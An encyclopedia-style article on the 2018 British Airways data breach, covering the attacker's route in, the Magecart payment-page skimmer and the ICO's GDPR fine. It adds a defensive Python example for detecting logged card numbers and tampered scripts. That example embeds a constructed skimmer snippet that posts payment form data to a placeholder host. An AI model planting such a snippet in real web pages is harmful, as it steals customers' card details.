British Airways data breach

In 2018, the UK flag carrier British Airways suffered a cyberattack in which the personal and financial details of hundreds of thousands of customers who made bookings on BA's website and mobile application were stolen. Subsequent investigations by the United Kingdom Information Commissioner's Office (ICO) found that the attacker was in a position to access personal data relating to about 429,612 individuals, including roughly 244,000 customers whose names, addresses, payment card numbers, expiry dates and card verification values (CVVs) were exposed.

The attacker first accessed British Airways' network in June 2018 using compromised credentials belonging to a third-party supplier, entered a Citrix-based remote access environment, broke out of that environment's restrictions and then moved laterally through the network. They discovered that British Airways had been logging payment card data for certain transactions in plaintext (unencrypted) since 2015, and later modified JavaScript on the airline's payment pages so that card data entered by customers was copied to an attacker-controlled website while bookings appeared to complete normally. Cybersecurity firm RiskIQ, among others, attributed the attack to the web-skimming group known as Magecart.
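The two technical findings in the paragraph above, card data written to logs in plaintext and a payment-page script altered to copy form contents elsewhere, each correspond to a check a practitioner would run. What follows is an added example written for this article; it is not code from British Airways, the ICO or RiskIQ. It shows a Luhn-based scan that flags and truncates card numbers in log lines, a Subresource Integrity style hash comparison that detects a changed script, and a minimal Content-Security-Policy evaluation showing how a connect-src allowlist would refuse the exfiltration request. The log lines, the two scripts, the host names (airline.example, payments-cdn.example) and the policy string are all constructed for the example.

```python
import base64
import hashlib
import re
from urllib.parse import urlsplit

# ---- 1. Card numbers logged in plaintext -------------------------------------

def luhn_valid(digits):
    """Luhn checksum; every genuine payment card number passes it."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

# 13 to 19 digits, optionally separated by spaces or hyphens, not inside a longer run.
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

def _pan_from(match):
    digits = re.sub(r"[ -]", "", match.group())
    return digits if luhn_valid(digits) else None

def find_pans(text):
    """Digit runs that look like card numbers and pass Luhn (probable PANs)."""
    return [p for p in map(_pan_from, PAN_RE.finditer(text)) if p]

def mask_pan(text):
    """Truncate each probable PAN to first six and last four digits (PCI DSS style)."""
    def repl(m):
        pan = _pan_from(m)
        return m.group() if pan is None else pan[:6] + "*" * (len(pan) - 10) + pan[-4:]
    return PAN_RE.sub(repl, text)

# Constructed log lines; 4111111111111111 is a well-known Luhn-valid test number.
SAMPLE_LOG = [
    "2018-07-01T10:02:11Z booking=ABC123 pan=4111111111111111 exp=09/21 cvv=123",
    "2018-07-01T10:02:12Z booking=ABC124 status=confirmed",
    "2018-07-01T10:02:13Z booking=ABC125 ref=1234567890123",  # 13 digits, fails Luhn
]

# ---- 2. Payment-page script tampering and exfiltration -----------------------

def sri_hash(script_source):
    """Subresource Integrity value ('sha384-<base64>') for a script body."""
    return "sha384-" + base64.b64encode(hashlib.sha384(script_source).digest()).decode()

def script_modified(expected_integrity, served_source):
    """True when the script served now differs from the hash recorded at deployment."""
    return sri_hash(served_source) != expected_integrity

# Constructed scripts: a baseline, and the same file with a skimmer-style handler
# appended that posts the form contents to a third-party host (placeholder domain).
BASELINE_JS = b"document.getElementById('pay').addEventListener('submit', validate);\n"
TAMPERED_JS = BASELINE_JS + (
    b"document.getElementById('submit').addEventListener('mouseup', function () {\n"
    b"  var x = new XMLHttpRequest();\n"
    b"  x.open('POST', 'https://payments-cdn.example/collect');\n"
    b"  x.send(JSON.stringify(Object.fromEntries(new FormData(document.getElementById('pay')))));\n"
    b"});\n"
)

def csp_allows_connect(policy, page_origin, target_url):
    """Would a browser let a script on page_origin open a connection to target_url?
    Uses connect-src, falling back to default-src; supports 'none', 'self', '*',
    host sources and '*.host' wildcards. Schemes, ports and paths in host sources
    are not modelled, so this is a check for policies, not a CSP implementation."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    sources = directives.get("connect-src", directives.get("default-src"))
    if sources is None:
        return True                       # no applicable directive: unrestricted
    target, page = urlsplit(target_url), urlsplit(page_origin)
    for src in sources:
        s = src.strip("'").lower()
        if s == "none":
            return False
        if s == "*":
            return True
        if s == "self":
            if (target.scheme, target.hostname, target.port) == (page.scheme, page.hostname, page.port):
                return True
            continue
        host = s.split("://", 1)[-1].split("/", 1)[0].split(":", 1)[0]
        if host.startswith("*.") and target.hostname.endswith(host[1:]):
            return True
        if host == target.hostname:
            return True
    return False
```

The hash baseline is only useful if it is recorded and checked from outside the web tier, so that an attacker who can edit the script cannot also edit the reference value. A connect-src allowlist restricts where in-page scripts may send data, but it does not stop a script from rewriting a form's action attribute, so form-action should be restricted alongside it.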

The breach was a high-profile test of the General Data Protection Regulation (GDPR) for a major airline. In 2019 the ICO announced its intention to fine British Airways £183.39 million; after further analysis and consideration of mitigating factors this was reduced to a £20 million penalty issued in October 2020. The incident also led to group litigation on behalf of affected customers, described by claimant law firms as the largest personal-data group action in UK history, which was settled out of court in 2021.

British Airways (BA) is the flag carrier of the United Kingdom. It is headquartered in London, England at Waterside, near its main hub at Heathrow Airport.

At the time of the 2018 data breach, British Airways' reputation had been affected by several high-profile operational disruptions, including a major IT systems outage in May 2017 that led to hundreds of flight cancellations from Heathrow and Gatwick and stranded tens of thousands of passengers worldwide.

The data breach also occurred soon after the General Data Protection Regulation (GDPR) came into force across the European Union on 25 May 2018. GDPR introduced stricter obligations on organisations that act as controllers or processors of personal data and allowed regulators to impose administrative fines of up to 4 percent of annual worldwide turnover or €20 million, whichever is higher.

On 22 June 2018, an attacker gained access to the British Airways network by means of compromised login details—a stolen username and password—from an employee of Swissport, a third-party cargo handler. The compromised account did not have multi-factor authentication (MFA) enabled, a security measure that requires a second step in addition to a password, such as a code sent to a phone. British Airways later found that the attacker had compromised five such Swissport accounts.

The accounts allowed the attacker to access only a limited set of applications and data within a virtual environment provided by the Citrix platform, which British Airways used to let staff and partners run internal applications over the internet. However, the attacker was able to break out of that environment. Having done so, they found the username and password of a highly privileged account saved in a file that could be read by any user of the domain.
